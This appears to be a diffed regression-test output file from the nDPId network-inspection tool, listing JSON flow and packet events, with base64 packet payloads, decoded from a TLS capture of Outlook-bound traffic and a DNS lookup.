zcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2o
qpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} +01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9
gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6e
kzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGEWCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzAR1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} 
+01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1LqA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} 
+02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7
XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} +02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoT
zcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1626168078676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1626168078676,"pkt":"8BiYFWV8WNVuaKQACABFAACFmUUAAHgR1vEICAgIwKgBeQA1yx4AcZEiotGBgAABAAEAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAABwAwADAABAABT5QAzDGEyLTIyLTMzLTIzNQZkZXBsb3kGc3RhdGljEmFrYW1haXRlY2hub2xvZ2llcwNjb20A"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 
-00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
